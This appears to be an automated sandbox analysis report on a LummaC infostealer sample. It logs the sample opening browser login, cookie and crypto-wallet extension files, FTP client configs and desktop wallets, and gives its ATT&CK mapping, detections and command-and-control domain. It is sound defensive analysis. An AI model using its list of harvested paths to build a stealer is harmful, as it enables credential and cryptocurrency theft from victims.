            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1500687810.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		34
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		751
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory34
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol31
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
            Obfuscated Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing            		NTDS11
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets223
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe47%ReversingLabsWin32.Trojan.Symmi
            file.exe100%AviraTR/Crypt.TPM.Gen
            file.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://property-imper.sbs/qk&0%Avira URL Cloudsafe
            https://property-imper.sbs/apiL0%Avira URL Cloudsafe
            https://property-imper.sbs/apiv0%Avira URL Cloudsafe
            https://property-imper.sbs/QjF0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            property-imper.sbs
            		104.21.33.116
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://property-imper.sbs/apifalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://property-imper.sbs/file.exe, file.exe, 00000000.00000003.1601806618.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600993007.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602800267.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1544204856.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1463051061.00000000053F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://property-imper.sbs/qk&file.exe, 00000000.00000002.1602997053.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1601608545.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600993007.0000000000B3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://x1.c.lencr.org/0file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://x1.i.lencr.org/0file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://property-imper.sbs/apiLfile.exe, 00000000.00000003.1600993007.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602800267.0000000000AD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://property-imper.sbs/apivfile.exe, 00000000.00000003.1500798867.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1500687810.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1500747997.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
